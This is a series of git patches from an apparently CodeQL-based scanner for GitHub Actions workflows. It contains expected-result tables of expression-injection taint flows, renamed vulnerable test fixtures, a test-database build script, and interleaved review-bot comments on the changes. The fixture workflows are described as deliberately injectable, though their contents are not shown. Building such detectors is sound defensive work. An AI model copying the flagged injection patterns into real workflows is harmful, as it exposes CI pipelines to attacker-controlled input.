.ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected index 5dd2313e851..49ec00e20f7 100644 --- a/ql/src/test/test.expected +++ b/ql/src/test/test.expected 
@@ -27,6 +27,10 @@ edges | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | 
@@ -93,6 +97,11 @@ nodes | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | 
@@ -144,6 +153,7 @@ subpaths | .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | | .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... 
d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | From 5b40d98849f571d683111ef8ab9e721be5cede89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 14:36:17 +0100 Subject: [PATCH 0079/1267] Update test db build script --- build-test-dbs.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/build-test-dbs.sh b/build-test-dbs.sh index d8fc4359b92..bb85dc78a37 100755 --- a/build-test-dbs.sh +++ b/build-test-dbs.sh @@ -1,4 +1,6 @@ #!/bin/bash +rm -rf ql/lib/test/test.testproj || true +rm -rf ql/src/test/test.testproj || true rm -rf src-test.testproj || true rm -rf lib-test.testproj || true codeql database create src-test.testproj -l yaml -s ql/src/test From 6b11506abb7c42fe0c7cffcaf06f776fb1787873 Mon Sep 17 00:00:00 2001 
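Review bot: The two added lines, `rm -rf ql/lib/test/test.testproj || true` and `rm -rf ql/src/test/test.testproj || true`, use paths relative to the caller's working directory, so running the script from anywhere other than the repository root removes whatever matches there or silently misses the intended directories. Anchoring the script right after the shebang with `cd "$(dirname "$0")" || exit 1` fixes the targets. The `|| true` is also redundant: `rm -f` already exits 0 for a missing path, so the suffix only hides real failures such as a permission error, and plain `rm -rf ql/lib/test/test.testproj` is enough. The script continues past the end of this hunk, where the existing `rm -rf` lines follow the same pattern.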
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 29 Feb 2024 13:23:59 +0100 Subject: [PATCH 0080/1267] test: Add tests --- .gitignore | 1 + build-test-dbs.sh | 7 - codeql-workspace.yml | 3 +- ql/lib/codeql/actions/Ast.qll | 7 +- .../codeql/actions/ast/internal/Actions.qll | 2 - ql/lib/qlpack.yml | 1 - ...maries.ql => CompositeActionsSummaries.ql} | 0 ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 6 +- .../{CWE-094 => CWE-829}/UntrustedCheckout.md | 0 .../{CWE-094 => CWE-829}/UntrustedCheckout.ql | 2 +- ql/src/qlpack.yml | 1 - ql/src/test/test.expected | 162 ------------ ql/src/test/test.ql | 37 --- ql/test/codeql-pack.lock.yml | 16 ++ .../library-tests}/.github/workflows/test.yml | 0 .../test => test/library-tests}/test.expected | 0 ql/{lib/test => test/library-tests}/test.ql | 0 ql/test/qlpack.yml | 12 + .../.github/workflows/calling_composite.yml | 1 + .../.github/workflows/calling_workflow.yml | 1 + .../.github/workflows/reusable_workflow.yml | 1 + .../CWE-020/CompositeActionsSinks.expected | 15 ++ .../CWE-020/CompositeActionsSinks.qlref | 1 + .../CWE-020/CompositeActionsSources.expected | 12 + .../CWE-020/CompositeActionsSources.qlref | 2 + .../CompositeActionsSummaries.expected | 12 + .../CWE-020/CompositeActionsSummaries.qlref | 2 + .../CWE-020/ReusableWorkflowsSinks.expected | 8 + .../CWE-020/ReusableWorkflowsSinks.qlref | 2 + .../CWE-020/ReusableWorkflowsSources.expected | 12 + .../CWE-020/ReusableWorkflowsSources.qlref | 2 + .../ReusableWorkflowsSummaries.expected | 16 ++ .../CWE-020/ReusableWorkflowsSummaries.qlref | 2 + .../Security/CWE-020/action1}/action.yml | 1 + .../.github/workflows/argus_case_study.yml | 0 .../.github/workflows/changed-files.yml | 0 .../.github/workflows/comment_issue.yml | 28 +++ .../workflows/comment_issue_newline.yml | 10 + .../CWE-094}/.github/workflows/cross1.yml | 0 .../CWE-094}/.github/workflows/cross2.yml | 0 .../CWE-094}/.github/workflows/cross3.yml | 0 .../CWE-094/.github/workflows/discussion.yml | 8 + 
.../.github/workflows/discussion_comment.yml | 9 + .../CWE-094/.github/workflows/gollum.yml | 11 + .../workflows/image_link_generator.yml | 0 .../CWE-094}/.github/workflows/inter-job.yml | 0 .../CWE-094/.github/workflows/issues.yaml | 20 ++ .../CWE-094}/.github/workflows/matrix.yml | 0 .../CWE-094}/.github/workflows/no-flow1.yml | 0 .../CWE-094}/.github/workflows/no-flow2.yml | 0 .../.github/workflows/pull_request_review.yml | 14 ++ .../workflows/pull_request_review_comment.yml | 14 ++ .../.github/workflows/pull_request_target.yml | 16 ++ .../CWE-094/.github/workflows/push.yml | 16 ++ .../CWE-094}/.github/workflows/simple1.yml | 0 .../CWE-094}/.github/workflows/simple2.yml | 0 .../CWE-094}/.github/workflows/test.yml | 0 .../.github/workflows/workflow_run.yml | 16 ++ .../CriticalExpressionInjection.expected | 227 +++++++++++++++++ .../CWE-094/CriticalExpressionInjection.qlref | 1 + .../CWE-094/ExpressionInjection.expected | 233 ++++++++++++++++++ .../CWE-094/ExpressionInjection.qlref | 1 + .../Security/CWE-094/action1/action.yml | 14 ++ .../Security/CWE-094/action2/action.yml | 17 ++ .../.github/workflows/missing_perms.yml | 10 + .../CWE-275/.github/workflows/perms.yml | 13 + .../MissingActionsPermissions.expected | 1 + .../CWE-275/MissingActionsPermissions.qlref | 2 + .../workflows/actor_trusted_checkout.yml | 0 .../workflows/label_trusted_checkout.yml | 0 .../.github/workflows/unpinned_tags.yml | 11 + .../.github/workflows/untrusted_checkout.yml | 0 .../CWE-829/UnpinnedActionsTag.expected | 7 + .../Security/CWE-829/UnpinnedActionsTag.qlref | 1 + .../CWE-829/UntrustedCheckout.expected | 1 + .../Security/CWE-829/UntrustedCheckout.qlref | 1 + 76 files changed, 833 insertions(+), 216 deletions(-) delete mode 100755 build-test-dbs.sh rename ql/src/Security/CWE-020/{CompositeActionSummaries.ql => CompositeActionsSummaries.ql} (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.md (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.ql 
(98%) delete mode 100644 ql/src/test/test.expected delete mode 100644 ql/src/test/test.ql create mode 100644 ql/test/codeql-pack.lock.yml rename ql/{lib/test => test/library-tests}/.github/workflows/test.yml (100%) rename ql/{lib/test => test/library-tests}/test.expected (100%) rename ql/{lib/test => test/library-tests}/test.ql (100%) create mode 100644 ql/test/qlpack.yml rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_composite.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_workflow.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/reusable_workflow.yml (99%) create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename ql/{src/test/composite-actions => test/query-tests/Security/CWE-020/action1}/action.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/argus_case_study.yml (100%) rename ql/{src/test => 
test/query-tests/Security/CWE-094}/.github/workflows/changed-files.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross2.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross3.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/image_link_generator.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/inter-job.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/matrix.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow2.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple2.yml (100%) rename ql/{src/test => 
test/query-tests/Security/CWE-094}/.github/workflows/test.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/action2/action.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/actor_trusted_checkout.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/label_trusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/untrusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref diff --git a/.gitignore b/.gitignore index e147f87bf72..6c0e5c58738 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ **/*.testproj ql/lib/.codeql/ ql/src/.codeql/ +ql/test/.codeql/ 
diff --git a/build-test-dbs.sh b/build-test-dbs.sh deleted file mode 100755 index bb85dc78a37..00000000000 --- a/build-test-dbs.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -rm -rf ql/lib/test/test.testproj || true -rm -rf ql/src/test/test.testproj || true -rm -rf src-test.testproj || true -rm -rf lib-test.testproj || true -codeql database create src-test.testproj -l yaml -s ql/src/test -codeql database create lib-test.testproj -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml index ad62591967d..f00f92b346f 100644 --- a/codeql-workspace.yml +++ b/codeql-workspace.yml @@ -1,3 +1,4 @@ provide: - "**/ql/src/qlpack.yml" - - "**/ql/lib/qlpack.yml" \ No newline at end of file + - "**/ql/lib/qlpack.yml" + - "**/ql/test/qlpack.yml" diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c2b1cda8277..2bbf5c8ac0d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -270,7 +270,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getCallee() { result = uses.getGitHubRepository() } - override string getVersion() { result = uses.getVersion() } + override string getVersion() { + result = uses.getVersion() + or + not exists(uses.getVersion()) and + result = "main" + } override Expression getArgumentExpr(string key) { exists(Actions::With with | diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index 2fb17eef88b..fe10441fd67 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -6,7 +6,6 @@ import codeql.actions.ast.internal.Yaml import codeql.files.FileSystem -// ALVARO: Make it private /** * Libraries for modeling GitHub Actions workflow files written in YAML. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. 
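Review bot: `getVersion()` in the `Ast.qll` hunk now returns the literal `"main"` when the `uses:` value carries no version, so every caller sees a missing ref as if it were an explicit `main`. `UnpinnedActionsTag.ql` in this same commit binds `uses.getVersion() = version` and prints it in the alert, so such a step is reported "with ref 'main'" although the workflow names none; nothing visible checks that the called repository's default branch is actually `main`. At minimum the fallback needs a QLDoc comment on the predicate, e.g. `/** Gets the version (ref) of the called action; when the step names none, the placeholder "main" is returned. */`. It would be clearer still if the query reported the absent ref as such instead of a guessed branch name. The enclosing class `StepUsesExpr` starts and ends outside this hunk.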
@@ -376,7 +375,6 @@ module Actions { } /** - * ALVARO * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ class Needs extends YamlNode { diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c344549245..a0f348977ab 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -10,7 +10,6 @@ dependencies: codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml -tests: test groups: - yaml dataExtensions: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionSummaries.ql rename to ql/src/Security/CWE-020/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 12bc06481be..3c951a4e0b0 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -24,15 +24,15 @@ private predicate isTrustedOrg(string repo) { from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name where uses.getCallee() = repo and - uses.getVersion() = version and uses.getEnclosingWorkflowStmt() = workflow and ( workflow.getName() = name or not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name ) and - not isPinnedCommit(version) and - not isTrustedOrg(repo) + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) select uses, "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckout.md similarity index 100% rename from ql/src/Security/CWE-094/UntrustedCheckout.md rename to ql/src/Security/CWE-829/UntrustedCheckout.md 
diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql similarity index 98% rename from ql/src/Security/CWE-094/UntrustedCheckout.ql rename to ql/src/Security/CWE-829/UntrustedCheckout.ql index bb6c0d9a029..3c745b5d84a 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -10,7 +10,7 @@ * @id actions/untrusted-checkout * @tags actions * security - * external/cwe/cwe-094 + * external/cwe/cwe-829 */ import actions diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 346079df984..aff53d45dde 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -11,4 +11,3 @@ defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true -tests: test diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected deleted file mode 100644 index 49ec00e20f7..00000000000 --- a/ql/src/test/test.expected +++ /dev/null 
@@ -1,162 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... 
g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... 
d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... 
utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | 